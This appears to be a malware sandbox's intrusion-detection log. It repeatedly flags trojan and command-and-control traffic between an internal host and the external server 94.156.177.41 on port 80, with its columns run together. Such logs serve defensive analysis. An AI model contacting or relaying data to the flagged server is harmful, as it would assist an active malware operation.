            2024-11-20T10:58:05.314152+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458565TCP
            2024-11-20T10:58:06.214440+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458572TCP
            2024-11-20T10:58:07.131818+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458582TCP
            2024-11-20T10:58:08.029885+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458588TCP
            2024-11-20T10:58:08.916984+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458594TCP
            2024-11-20T10:58:09.804164+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458600TCP
            2024-11-20T10:58:10.701298+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458606TCP
            2024-11-20T10:58:11.600677+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458613TCP
            2024-11-20T10:58:12.573029+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458623TCP
            2024-11-20T10:58:13.489483+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458629TCP
            2024-11-20T10:58:14.401721+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458635TCP
            2024-11-20T10:58:15.287376+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458641TCP
            2024-11-20T10:58:16.234194+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458650TCP
            2024-11-20T10:58:17.143458+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458657TCP
            2024-11-20T10:58:18.036772+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458664TCP
            2024-11-20T10:58:18.921296+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458670TCP
            2024-11-20T10:58:19.988578+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458675TCP
            2024-11-20T10:58:20.898961+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458683TCP
            2024-11-20T10:58:21.781334+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458688TCP
            2024-11-20T10:58:22.701370+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458695TCP
            2024-11-20T10:58:23.598769+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458701TCP
            2024-11-20T10:58:24.496109+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458708TCP
            2024-11-20T10:58:25.395417+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458715TCP
            2024-11-20T10:58:26.284982+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458723TCP
            2024-11-20T10:58:27.290814+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458730TCP
            2024-11-20T10:58:28.184409+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458736TCP
            2024-11-20T10:58:29.071403+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458742TCP
            2024-11-20T10:58:29.956898+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458752TCP
            2024-11-20T10:58:30.885831+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458758TCP
            2024-11-20T10:58:31.758131+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458764TCP
            2024-11-20T10:58:32.777803+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458770TCP
            2024-11-20T10:58:33.672124+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458777TCP
            2024-11-20T10:58:34.546153+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458786TCP
            2024-11-20T10:58:35.497561+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458792TCP
            2024-11-20T10:58:36.389612+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458799TCP
            2024-11-20T10:58:37.281758+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458806TCP
            2024-11-20T10:58:38.186261+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458812TCP
            2024-11-20T10:58:39.080679+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458818TCP
            2024-11-20T10:58:39.986192+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458827TCP
            2024-11-20T10:58:40.887054+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458828TCP
            2024-11-20T10:58:41.787253+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458829TCP
            2024-11-20T10:58:42.707455+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458830TCP
            2024-11-20T10:58:43.626218+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458831TCP
            2024-11-20T10:58:44.673346+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458832TCP
            2024-11-20T10:58:45.779217+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458833TCP
            2024-11-20T10:58:46.711977+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458834TCP
            2024-11-20T10:58:47.644969+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458835TCP
            2024-11-20T10:58:48.573043+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458836TCP
            2024-11-20T10:58:49.481216+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458837TCP
            2024-11-20T10:58:50.374368+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458838TCP
            2024-11-20T10:58:51.275613+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458839TCP
            2024-11-20T10:58:52.215522+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458840TCP
            2024-11-20T10:58:53.253974+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458841TCP
            2024-11-20T10:58:54.200047+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458842TCP
            2024-11-20T10:58:55.236154+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458843TCP
            2024-11-20T10:58:56.125650+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458844TCP
            2024-11-20T10:58:57.208517+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458845TCP
            2024-11-20T10:58:58.152996+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458846TCP
            2024-11-20T10:58:59.072614+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458847TCP
            2024-11-20T10:59:00.169904+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458848TCP
            2024-11-20T10:59:01.201970+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458849TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-20T10:57:15.973269+010020243131Malware Command and Control Activity Detected192.168.2.44973794.156.177.4180TCP
            2024-11-20T10:57:16.996278+010020243131Malware Command and Control Activity Detected192.168.2.44973994.156.177.4180TCP
            2024-11-20T10:57:17.928297+010020243131Malware Command and Control Activity Detected192.168.2.44974094.156.177.4180TCP
            2024-11-20T10:57:18.827777+010020243131Malware Command and Control Activity Detected192.168.2.44974294.156.177.4180TCP
            2024-11-20T10:57:19.860877+010020243131Malware Command and Control Activity Detected192.168.2.44974694.156.177.4180TCP
            2024-11-20T10:57:20.941871+010020243131Malware Command and Control Activity Detected192.168.2.44974894.156.177.4180TCP
            2024-11-20T10:57:21.966321+010020243131Malware Command and Control Activity Detected192.168.2.44975094.156.177.4180TCP
            2024-11-20T10:57:22.899768+010020243131Malware Command and Control Activity Detected192.168.2.44975194.156.177.4180TCP
            2024-11-20T10:57:23.803116+010020243131Malware Command and Control Activity Detected192.168.2.44975294.156.177.4180TCP
            2024-11-20T10:57:24.685646+010020243131Malware Command and Control Activity Detected192.168.2.44975394.156.177.4180TCP
            2024-11-20T10:57:25.787244+010020243131Malware Command and Control Activity Detected192.168.2.44975494.156.177.4180TCP
            2024-11-20T10:57:26.822818+010020243131Malware Command and Control Activity Detected192.168.2.44975594.156.177.4180TCP
            2024-11-20T10:57:27.739805+010020243131Malware Command and Control Activity Detected192.168.2.44975694.156.177.4180TCP
            2024-11-20T10:57:28.632253+010020243131Malware Command and Control Activity Detected192.168.2.44975794.156.177.4180TCP
            2024-11-20T10:57:29.544680+010020243131Malware Command and Control Activity Detected192.168.2.44975894.156.177.4180TCP
            2024-11-20T10:57:30.509633+010020243131Malware Command and Control Activity Detected192.168.2.44975994.156.177.4180TCP
            2024-11-20T10:57:31.416743+010020243131Malware Command and Control Activity Detected192.168.2.44976094.156.177.4180TCP
            2024-11-20T10:57:32.379994+010020243131Malware Command and Control Activity Detected192.168.2.44976194.156.177.4180TCP
            2024-11-20T10:57:33.635907+010020243131Malware Command and Control Activity Detected192.168.2.44976294.156.177.4180TCP
            2024-11-20T10:57:34.562494+010020243131Malware Command and Control Activity Detected192.168.2.44976394.156.177.4180TCP
            2024-11-20T10:57:35.466504+010020243131Malware Command and Control Activity Detected192.168.2.45848994.156.177.4180TCP
            2024-11-20T10:57:36.395872+010020243131Malware Command and Control Activity Detected192.168.2.45849194.156.177.4180TCP
            2024-11-20T10:57:37.284752+010020243131Malware Command and Control Activity Detected192.168.2.45849294.156.177.4180TCP
            2024-11-20T10:57:38.278254+010020243131Malware Command and Control Activity Detected192.168.2.45849394.156.177.4180TCP
            2024-11-20T10:57:39.182621+010020243131Malware Command and Control Activity Detected192.168.2.45849594.156.177.4180TCP
            2024-11-20T10:57:40.084264+010020243131Malware Command and Control Activity Detected192.168.2.45849794.156.177.4180TCP
            2024-11-20T10:57:41.132330+010020243131Malware Command and Control Activity Detected192.168.2.45849894.156.177.4180TCP
            2024-11-20T10:57:42.026338+010020243131Malware Command and Control Activity Detected192.168.2.45849994.156.177.4180TCP
            2024-11-20T10:57:42.950176+010020243131Malware Command and Control Activity Detected192.168.2.45850094.156.177.4180TCP
            2024-11-20T10:57:43.869492+010020243131Malware Command and Control Activity Detected192.168.2.45850194.156.177.4180TCP
            2024-11-20T10:57:44.776690+010020243131Malware Command and Control Activity Detected192.168.2.45850294.156.177.4180TCP
            2024-11-20T10:57:45.698675+010020243131Malware Command and Control Activity Detected192.168.2.45850394.156.177.4180TCP
            2024-11-20T10:57:46.613808+010020243131Malware Command and Control Activity Detected192.168.2.45850494.156.177.4180TCP
            2024-11-20T10:57:47.563624+010020243131Malware Command and Control Activity Detected192.168.2.45850594.156.177.4180TCP
            2024-11-20T10:57:48.462037+010020243131Malware Command and Control Activity Detected192.168.2.45850694.156.177.4180TCP
            2024-11-20T10:57:49.351507+010020243131Malware Command and Control Activity Detected192.168.2.45850794.156.177.4180TCP
            2024-11-20T10:57:50.261043+010020243131Malware Command and Control Activity Detected192.168.2.45850894.156.177.4180TCP
            2024-11-20T10:57:51.211483+010020243131Malware Command and Control Activity Detected192.168.2.45850994.156.177.4180TCP
            2024-11-20T10:57:52.132109+010020243131Malware Command and Control Activity Detected192.168.2.45851094.156.177.4180TCP
            2024-11-20T10:57:53.044496+010020243131Malware Command and Control Activity Detected192.168.2.45851194.156.177.4180TCP
            2024-11-20T10:57:53.951456+010020243131Malware Command and Control Activity Detected192.168.2.45851294.156.177.4180TCP
            2024-11-20T10:57:54.873081+010020243131Malware Command and Control Activity Detected192.168.2.45851394.156.177.4180TCP
            2024-11-20T10:57:55.757238+010020243131Malware Command and Control Activity Detected192.168.2.45851494.156.177.4180TCP
            2024-11-20T10:57:56.797067+010020243131Malware Command and Control Activity Detected192.168.2.45851594.156.177.4180TCP
            2024-11-20T10:57:57.812611+010020243131Malware Command and Control Activity Detected192.168.2.45851694.156.177.4180TCP
            2024-11-20T10:57:58.732769+010020243131Malware Command and Control Activity Detected192.168.2.45851894.156.177.4180TCP
            2024-11-20T10:57:59.631770+010020243131Malware Command and Control Activity Detected192.168.2.45852494.156.177.4180TCP
            2024-11-20T10:58:00.539641+010020243131Malware Command and Control Activity Detected192.168.2.45853094.156.177.4180TCP
            2024-11-20T10:58:01.431288+010020243131Malware Command and Control Activity Detected192.168.2.45853694.156.177.4180TCP
            2024-11-20T10:58:02.329621+010020243131Malware Command and Control Activity Detected192.168.2.45854394.156.177.4180TCP
            2024-11-20T10:58:03.354106+010020243131Malware Command and Control Activity Detected192.168.2.45855394.156.177.4180TCP
            2024-11-20T10:58:04.399422+010020243131Malware Command and Control Activity Detected192.168.2.45855994.156.177.4180TCP
            2024-11-20T10:58:05.306460+010020243131Malware Command and Control Activity Detected192.168.2.45856594.156.177.4180TCP
            2024-11-20T10:58:06.207266+010020243131Malware Command and Control Activity Detected192.168.2.45857294.156.177.4180TCP
            2024-11-20T10:58:07.123685+010020243131Malware Command and Control Activity Detected192.168.2.45858294.156.177.4180TCP
            2024-11-20T10:58:08.022326+010020243131Malware Command and Control Activity Detected192.168.2.45858894.156.177.4180TCP
            2024-11-20T10:58:08.911860+010020243131Malware Command and Control Activity Detected192.168.2.45859494.156.177.4180TCP
            2024-11-20T10:58:09.796821+010020243131Malware Command and Control Activity Detected192.168.2.45860094.156.177.4180TCP
            2024-11-20T10:58:10.692365+010020243131Malware Command and Control Activity Detected192.168.2.45860694.156.177.4180TCP
            2024-11-20T10:58:11.593143+010020243131Malware Command and Control Activity Detected192.168.2.45861394.156.177.4180TCP
            2024-11-20T10:58:12.566744+010020243131Malware Command and Control Activity Detected192.168.2.45862394.156.177.4180TCP
            2024-11-20T10:58:13.483556+010020243131Malware Command and Control Activity Detected192.168.2.45862994.156.177.4180TCP
            2024-11-20T10:58:14.396851+010020243131Malware Command and Control Activity Detected192.168.2.45863594.156.177.4180TCP
            2024-11-20T10:58:15.281301+010020243131Malware Command and Control Activity Detected192.168.2.45864194.156.177.4180TCP
            2024-11-20T10:58:16.229259+010020243131Malware Command and Control Activity Detected192.168.2.45865094.156.177.4180TCP
            2024-11-20T10:58:17.138537+010020243131Malware Command and Control Activity Detected192.168.2.45865794.156.177.4180TCP
            2024-11-20T10:58:18.031801+010020243131Malware Command and Control Activity Detected192.168.2.45866494.156.177.4180TCP
            2024-11-20T10:58:18.916385+010020243131Malware Command and Control Activity Detected192.168.2.45867094.156.177.4180TCP
            2024-11-20T10:58:19.983626+010020243131Malware Command and Control Activity Detected192.168.2.45867594.156.177.4180TCP
            2024-11-20T10:58:20.890029+010020243131Malware Command and Control Activity Detected192.168.2.45868394.156.177.4180TCP
            2024-11-20T10:58:21.775558+010020243131Malware Command and Control Activity Detected192.168.2.45868894.156.177.4180TCP
            2024-11-20T10:58:22.695646+010020243131Malware Command and Control Activity Detected192.168.2.45869594.156.177.4180TCP
            2024-11-20T10:58:23.591646+010020243131Malware Command and Control Activity Detected192.168.2.45870194.156.177.4180TCP
            2024-11-20T10:58:24.491168+010020243131Malware Command and Control Activity Detected192.168.2.45870894.156.177.4180TCP
            2024-11-20T10:58:25.390472+010020243131Malware Command and Control Activity Detected192.168.2.45871594.156.177.4180TCP
            2024-11-20T10:58:26.277828+010020243131Malware Command and Control Activity Detected192.168.2.45872394.156.177.4180TCP
            2024-11-20T10:58:27.285839+010020243131Malware Command and Control Activity Detected192.168.2.45873094.156.177.4180TCP
            2024-11-20T10:58:28.175851+010020243131Malware Command and Control Activity Detected192.168.2.45873694.156.177.4180TCP
            2024-11-20T10:58:29.063529+010020243131Malware Command and Control Activity Detected192.168.2.45874294.156.177.4180TCP
            2024-11-20T10:58:29.952000+010020243131Malware Command and Control Activity Detected192.168.2.45875294.156.177.4180TCP
            2024-11-20T10:58:30.880809+010020243131Malware Command and Control Activity Detected192.168.2.45875894.156.177.4180TCP
            2024-11-20T10:58:31.753244+010020243131Malware Command and Control Activity Detected192.168.2.45876494.156.177.4180TCP
            2024-11-20T10:58:32.772838+010020243131Malware Command and Control Activity Detected192.168.2.45877094.156.177.4180TCP
            2024-11-20T10:58:33.662624+010020243131Malware Command and Control Activity Detected192.168.2.45877794.156.177.4180TCP
            2024-11-20T10:58:34.541285+010020243131Malware Command and Control Activity Detected192.168.2.45878694.156.177.4180TCP
            2024-11-20T10:58:35.492666+010020243131Malware Command and Control Activity Detected192.168.2.45879294.156.177.4180TCP
            2024-11-20T10:58:36.384795+010020243131Malware Command and Control Activity Detected192.168.2.45879994.156.177.4180TCP
            2024-11-20T10:58:37.276883+010020243131Malware Command and Control Activity Detected192.168.2.45880694.156.177.4180TCP
            2024-11-20T10:58:38.177894+010020243131Malware Command and Control Activity Detected192.168.2.45881294.156.177.4180TCP
            2024-11-20T10:58:39.075545+010020243131Malware Command and Control Activity Detected192.168.2.45881894.156.177.4180TCP
            2024-11-20T10:58:39.980307+010020243131Malware Command and Control Activity Detected192.168.2.45882794.156.177.4180TCP
            2024-11-20T10:58:40.880124+010020243131Malware Command and Control Activity Detected192.168.2.45882894.156.177.4180TCP
            2024-11-20T10:58:41.780911+010020243131Malware Command and Control Activity Detected192.168.2.45882994.156.177.4180TCP
            2024-11-20T10:58:42.700127+010020243131Malware Command and Control Activity Detected192.168.2.45883094.156.177.4180TCP
            2024-11-20T10:58:43.621342+010020243131Malware Command and Control Activity Detected192.168.2.45883194.156.177.4180TCP
            2024-11-20T10:58:44.665098+010020243131Malware Command and Control Activity Detected192.168.2.45883294.156.177.4180TCP
            2024-11-20T10:58:45.774285+010020243131Malware Command and Control Activity Detected192.168.2.45883394.156.177.4180TCP
            2024-11-20T10:58:46.706839+010020243131Malware Command and Control Activity Detected192.168.2.45883494.156.177.4180TCP
            2024-11-20T10:58:47.637543+010020243131Malware Command and Control Activity Detected192.168.2.45883594.156.177.4180TCP
            2024-11-20T10:58:48.568051+010020243131Malware Command and Control Activity Detected192.168.2.45883694.156.177.4180TCP
            2024-11-20T10:58:49.472958+010020243131Malware Command and Control Activity Detected192.168.2.45883794.156.177.4180TCP
            2024-11-20T10:58:50.369375+010020243131Malware Command and Control Activity Detected192.168.2.45883894.156.177.4180TCP
            2024-11-20T10:58:51.270204+010020243131Malware Command and Control Activity Detected192.168.2.45883994.156.177.4180TCP
            2024-11-20T10:58:52.210518+010020243131Malware Command and Control Activity Detected192.168.2.45884094.156.177.4180TCP
            2024-11-20T10:58:53.245528+010020243131Malware Command and Control Activity Detected192.168.2.45884194.156.177.4180TCP
            2024-11-20T10:58:54.194984+010020243131Malware Command and Control Activity Detected192.168.2.45884294.156.177.4180TCP
            2024-11-20T10:58:55.228559+010020243131Malware Command and Control Activity Detected192.168.2.45884394.156.177.4180TCP
            2024-11-20T10:58:56.119265+010020243131Malware Command and Control Activity Detected192.168.2.45884494.156.177.4180TCP
            2024-11-20T10:58:57.203522+010020243131Malware Command and Control Activity Detected192.168.2.45884594.156.177.4180TCP
            2024-11-20T10:58:58.145779+010020243131Malware Command and Control Activity Detected192.168.2.45884694.156.177.4180TCP
            2024-11-20T10:58:59.067132+010020243131Malware Command and Control Activity Detected192.168.2.45884794.156.177.4180TCP
            2024-11-20T10:59:00.142398+010020243131Malware Command and Control Activity Detected192.168.2.45884894.156.177.4180TCP
            2024-11-20T10:59:01.196244+010020243131Malware Command and Control Activity Detected192.168.2.45884994.156.177.4180TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-20T10:57:15.973269+010020243181Malware Command and Control Activity Detected192.168.2.44973794.156.177.4180TCP
            2024-11-20T10:57:16.996278+010020243181Malware Command and Control Activity Detected192.168.2.44973994.156.177.4180TCP
            2024-11-20T10:57:17.928297+010020243181Malware Command and Control Activity Detected192.168.2.44974094.156.177.4180TCP
            2024-11-20T10:57:18.827777+010020243181Malware Command and Control Activity Detected192.168.2.44974294.156.177.4180TCP
            2024-11-20T10:57:19.860877+010020243181Malware Command and Control Activity Detected192.168.2.44974694.156.177.4180TCP
            2024-11-20T10:57:20.941871+010020243181Malware Command and Control Activity Detected192.168.2.44974894.156.177.4180TCP
            2024-11-20T10:57:21.966321+010020243181Malware Command and Control Activity Detected192.168.2.44975094.156.177.4180TCP
            2024-11-20T10:57:22.899768+010020243181Malware Command and Control Activity Detected192.168.2.44975194.156.177.4180TCP
            2024-11-20T10:57:23.803116+010020243181Malware Command and Control Activity Detected192.168.2.44975294.156.177.4180TCP
            2024-11-20T10:57:24.685646+010020243181Malware Command and Control Activity Detected192.168.2.44975394.156.177.4180TCP
            2024-11-20T10:57:25.787244+010020243181Malware Command and Control Activity Detected192.168.2.44975494.156.177.4180TCP
            2024-11-20T10:57:26.822818+010020243181Malware Command and Control Activity Detected192.168.2.44975594.156.177.4180TCP
            2024-11-20T10:57:27.739805+010020243181Malware Command and Control Activity Detected192.168.2.44975694.156.177.4180TCP
            2024-11-20T10:57:28.632253+010020243181Malware Command and Control Activity Detected192.168.2.44975794.156.177.4180TCP
            2024-11-20T10:57:29.544680+010020243181Malware Command and Control Activity Detected192.168.2.44975894.156.177.4180TCP
            2024-11-20T10:57:30.509633+010020243181Malware Command and Control Activity Detected192.168.2.44975994.156.177.4180TCP
            2024-11-20T10:57:31.416743+010020243181Malware Command and Control Activity Detected192.168.2.44976094.156.177.4180TCP
            2024-11-20T10:57:32.379994+010020243181Malware Command and Control Activity Detected192.168.2.44976194.156.177.4180TCP
            2024-11-20T10:57:33.635907+010020243181Malware Command and Control Activity Detected192.168.2.44976294.156.177.4180TCP
            2024-11-20T10:57:34.562494+010020243181Malware Command and Control Activity Detected192.168.2.44976394.156.177.4180TCP
            2024-11-20T10:57:35.466504+010020243181Malware Command and Control Activity Detected192.168.2.45848994.156.177.4180TCP
            2024-11-20T10:57:36.395872+010020243181Malware Command and Control Activity Detected192.168.2.45849194.156.177.4180TCP
            2024-11-20T10:57:37.284752+010020243181Malware Command and Control Activity Detected192.168.2.45849294.156.177.4180TCP
            2024-11-20T10:57:38.278254+010020243181Malware Command and Control Activity Detected192.168.2.45849394.156.177.4180TCP
            2024-11-20T10:57:39.182621+010020243181Malware Command and Control Activity Detected192.168.2.45849594.156.177.4180TCP
            2024-11-20T10:57:40.084264+010020243181Malware Command and Control Activity Detected192.168.2.45849794.156.177.4180TCP
            2024-11-20T10:57:41.132330+010020243181Malware Command and Control Activity Detected192.168.2.45849894.156.177.4180TCP
            2024-11-20T10:57:42.026338+010020243181Malware Command and Control Activity Detected192.168.2.45849994.156.177.4180TCP
            2024-11-20T10:57:42.950176+010020243181Malware Command and Control Activity Detected192.168.2.45850094.156.177.4180TCP
            2024-11-20T10:57:43.869492+010020243181Malware Command and Control Activity Detected192.168.2.45850194.156.177.4180TCP
            2024-11-20T10:57:44.776690+010020243181Malware Command and Control Activity Detected192.168.2.45850294.156.177.4180TCP
            2024-11-20T10:57:45.698675+010020243181Malware Command and Control Activity Detected192.168.2.45850394.156.177.4180TCP
            2024-11-20T10:57:46.613808+010020243181Malware Command and Control Activity Detected192.168.2.45850494.156.177.4180TCP
            2024-11-20T10:57:47.563624+010020243181Malware Command and Control Activity Detected192.168.2.45850594.156.177.4180TCP
            2024-11-20T10:57:48.462037+010020243181Malware Command and Control Activity Detected192.168.2.45850694.156.177.4180TCP
            2024-11-20T10:57:49.351507+010020243181Malware Command and Control Activity Detected192.168.2.45850794.156.177.4180TCP
            2024-11-20T10:57:50.261043+010020243181Malware Command and Control Activity Detected192.168.2.45850894.156.177.4180TCP
            2024-11-20T10:57:51.211483+010020243181Malware Command and Control Activity Detected192.168.2.45850994.156.177.4180TCP
            2024-11-20T10:57:52.132109+010020243181Malware Command and Control Activity Detected192.168.2.45851094.156.177.4180TCP
            2024-11-20T10:57:53.044496+010020243181Malware Command and Control Activity Detected192.168.2.45851194.156.177.4180TCP
            2024-11-20T10:57:53.951456+010020243181Malware Command and Control Activity Detected192.168.2.45851294.156.177.4180TCP
            2024-11-20T10:57:54.873081+010020243181Malware Command and Control Activity Detected192.168.2.45851394.156.177.4180TCP
            2024-11-20T10:57:55.757238+010020243181Malware Command and Control Activity Detected192.168.2.45851494.156.177.4180TCP
            2024-11-20T10:57:56.797067+010020243181Malware Command and Control Activity Detected192.168.2.45851594.156.177.4180TCP
            2024-11-20T10:57:57.812611+010020243181Malware Command and Control Activity Detected192.168.2.45851694.156.177.4180TCP
            2024-11-20T10:57:58.732769+010020243181Malware Command and Control Activity Detected192.168.2.45851894.156.177.4180TCP
            2024-11-20T10:57:59.631770+010020243181Malware Command and Control Activity Detected192.168.2.45852494.156.177.4180TCP
            2024-11-20T10:58:00.539641+010020243181Malware Command and Control Activity Detected192.168.2.45853094.156.177.4180TCP
            2024-11-20T10:58:01.431288+010020243181Malware Command and Control Activity Detected192.168.2.45853694.156.177.4180TCP
            2024-11-20T10:58:02.329621+010020243181Malware Command and Control Activity Detected192.168.2.45854394.156.177.4180TCP
            2024-11-20T10:58:03.354106+010020243181Malware Command and Control Activity Detected192.168.2.45855394.156.177.4180TCP
            2024-11-20T10:58:04.399422+010020243181Malware Command and Control Activity Detected192.168.2.45855994.156.177.4180TCP
            2024-11-20T10:58:05.306460+010020243181Malware Command and Control Activity Detected192.168.2.45856594.156.177.4180TCP
            2024-11-20T10:58:06.207266+010020243181Malware Command and Control Activity Detected192.168.2.45857294.156.177.4180TCP
            2024-11-20T10:58:07.123685+010020243181Malware Command and Control Activity Detected192.168.2.45858294.156.177.4180TCP
            2024-11-20T10:58:08.022326+010020243181Malware Command and Control Activity Detected192.168.2.45858894.156.177.4180TCP
            2024-11-20T10:58:08.911860+010020243181Malware Command and Control Activity Detected192.168.2.45859494.156.177.4180TCP
            2024-11-20T10:58:09.796821+010020243181Malware Command and Control Activity Detected192.168.2.45860094.156.177.4180TCP
            2024-11-20T10:58:10.692365+010020243181Malware Command and Control Activity Detected192.168.2.45860694.156.177.4180TCP
            2024-11-20T10:58:11.593143+010020243181Malware Command and Control Activity Detected192.168.2.45861394.156.177.4180TCP
            2024-11-20T10:58:12.566744+010020243181Malware Command and Control Activity Detected192.168.2.45862394.156.177.4180TCP
            2024-11-20T10:58:13.483556+010020243181Malware Command and Control Activity Detected192.168.2.45862994.156.177.4180TCP
            2024-11-20T10:58:14.396851+010020243181Malware Command and Control Activity Detected192.168.2.45863594.156.177.4180TCP
            2024-11-20T10:58:15.281301+010020243181Malware Command and Control Activity Detected192.168.2.45864194.156.177.4180TCP
            2024-11-20T10:58:16.229259+010020243181Malware Command and Control Activity Detected192.168.2.45865094.156.177.4180TCP
            2024-11-20T10:58:17.138537+010020243181Malware Command and Control Activity Detected192.168.2.45865794.156.177.4180TCP
            2024-11-20T10:58:18.031801+010020243181Malware Command and Control Activity Detected192.168.2.45866494.156.177.4180TCP
            2024-11-20T10:58:18.916385+010020243181Malware Command and Control Activity Detected192.168.2.45867094.156.177.4180TCP
            2024-11-20T10:58:19.983626+010020243181Malware Command and Control Activity Detected192.168.2.45867594.156.177.4180TCP
            2024-11-20T10:58:20.890029+010020243181Malware Command and Control Activity Detected192.168.2.45868394.156.177.4180TCP
            2024-11-20T10:58:21.775558+010020243181Malware Command and Control Activity Detected192.168.2.45868894.156.177.4180TCP
            2024-11-20T10:58:22.695646+010020243181Malware Command and Control Activity Detected192.168.2.45869594.156.177.4180TCP
            2024-11-20T10:58:23.591646+010020243181Malware Command and Control Activity Detected192.168.2.45870194.156.177.4180TCP
            2024-11-20T10:58:24.491168+010020243181Malware Command and Control Activity Detected192.168.2.45870894.156.177.4180TCP
            2024-11-20T10:58:25.390472+010020243181Malware Command and Control Activity Detected192.168.2.45871594.156.177.4180TCP
            2024-11-20T10:58:26.277828+010020243181Malware Command and Control Activity Detected192.168.2.45872394.156.177.4180TCP
            2024-11-20T10:58:27.285839+010020243181Malware Command and Control Activity Detected192.168.2.45873094.156.177.4180TCP
            2024-11-20T10:58:28.175851+010020243181Malware Command and Control Activity Detected192.168.2.45873694.156.177.4180TCP
            2024-11-20T10:58:29.063529+010020243181Malware Command and Control Activity Detected192.168.2.45874294.156.177.4180TCP
            2024-11-20T10:58:29.952000+010020243181Malware Command and Control Activity Detected192.168.2.45875294.156.177.4180TCP
            2024-11-20T10:58:30.880809+010020243181Malware Command and Control Activity Detected192.168.2.45875894.156.177.4180TCP
            2024-11-20T10:58:31.753244+010020243181Malware Command and Control Activity Detected192.168.2.45876494.156.177.4180TCP
            2024-11-20T10:58:32.772838+010020243181Malware Command and Control Activity Detected192.168.2.45877094.156.177.4180TCP
            2024-11-20T10:58:33.662624+010020243181Malware Command and Control Activity Detected192.168.2.45877794.156.177.4180TCP
            2024-11-20T10:58:34.541285+010020243181Malware Command and Control Activity Detected192.168.2.45878694.156.177.4180TCP
            2024-11-20T10:58:35.492666+010020243181Malware Command and Control Activity Detected192.168.2.45879294.156.177.4180TCP
            2024-11-20T10:58:36.384795+010020243181Malware Command and Control Activity Detected192.168.2.45879994.156.177.4180TCP
            2024-11-20T10:58:37.276883+010020243181Malware Command and Control Activity Detected192.168.2.45880694.156.177.4180TCP
            2024-11-20T10:58:38.177894+010020243181Malware Command and Control Activity Detected192.168.2.45881294.156.177.4180TCP
            2024-11-20T10:58:39.075545+010020243181Malware Command and Control Activity Detected192.168.2.45881894.156.177.4180TCP
            2024-11-20T10:58:39.980307+010020243181Malware Command and Control Activity Detected192.168.2.45882794.156.177.4180TCP
            2024-11-20T10:58:40.880124+010020243181Malware Command and Control Activity Detected192.168.2.45882894.156.177.4180TCP
            2024-11-20T10:58:41.780911+010020243181Malware Command and Control Activity Detected192.168.2.45882994.156.177.4180TCP
            2024-11-20T10:58:42.700127+010020243181Malware Command and Control Activity Detected192.168.2.45883094.156.177.4180TCP
            2024-11-20T10:58:43.621342+010020243181Malware Command and Control Activity Detected192.168.2.45883194.156.177.4180TCP
            2024-11-20T10:58:44.665098+010020243181Malware Command and Control Activity Detected192.168.2.45883294.156.177.4180TCP
            2024-11-20T10:58:45.774285+010020243181Malware Command and Control Activity Detected192.168.2.45883394.156.177.4180TCP
            2024-11-20T10:58:46.706839+010020243181Malware Command and Control Activity Detected192.168.2.45883494.156.177.4180TCP
            2024-11-20T10:58:47.637543+010020243181Malware Command and Control Activity Detected192.168.2.45883594.156.177.4180TCP
            2024-11-20T10:58:48.568051+010020243181Malware Command and Control Activity Detected192.168.2.45883694.156.177.4180TCP
            2024-11-20T10:58:49.472958+010020243181Malware Command and Control Activity Detected192.168.2.45883794.156.177.4180TCP
